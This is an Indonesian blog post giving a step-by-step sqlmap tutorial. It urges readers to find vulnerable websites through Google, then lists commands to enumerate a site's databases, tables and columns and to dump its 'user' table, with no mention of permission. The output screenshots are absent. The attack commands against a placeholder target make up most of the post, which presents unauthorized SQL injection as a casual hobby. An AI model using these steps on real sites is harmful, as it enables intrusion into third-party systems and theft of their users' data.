Belajar SQLMap di Kali Linux ~ The Development of Technology

06/06/2014

Belajar SQLMap di Kali Linux

Pertama sebelum memulai menggunakan sqlmap, kamu harus terlebih dahulu menemukan website yang vuln baru bisa melanjutkan SQLi dengan sqlmap, bisa dicari digoogle kok website yang vuln hehehe:) Jika sudah dapet yang vuln yuk simak tutorial berikut

1. Buka terminal

2. Ketik

sqlmap -u http://www.web-vuln.com/section.php?id=31 --dbs

Output:

3. Lanjut ketahap 3. kita lihat screenshot diatas, disitu terdapat 2 database bernama "information_schema" dan "h8xxxxxxxx" . Untuk menemukan tables yang ada di database "namadatabase" gunakan command berikut

sqlmap -u http://www.web-vuln.com/section.php?id=31 --tables -D namadatabase

nah disini saya coba mengganti namadatabase dengan h83xxxx

sqlmap -u http://www.web-vuln.com/section.php?id=31 --tables -D h8xxxx

Output :

4. Gambar diatas menunjukkan 20 table yang terdapat di database h8xxx .Dan lanjut untuk menemukan columns, dengan command berikut

sqlmap -u http://www.web-vuln.com/section.php?id=31 --columns -Dnamadatabase -T namatable

contoh:

sqlmap -u http://www.web-vuln.com/section.php?id=31 --columns -D h8xxx -Tuser

Output :

5. Tahap terakhir yaitu melakukan dump pada kolom2 yang terdapat di table user dengan command

sqlmap -u http://www.vuln-web.com/section.php?id=31 --dump -Dnamadatabase -T namatable

6. Dump suksess

The Development of Technology

06/06/2014

Belajar SQLMap di Kali Linux

0 comments:

Post a Comment

Categories

Tags

Category

Recent Posts

Total Pageviews

Breaking

About Me

Popular Posts

Blog Archive

Blog Archive

Blogroll

About

Labels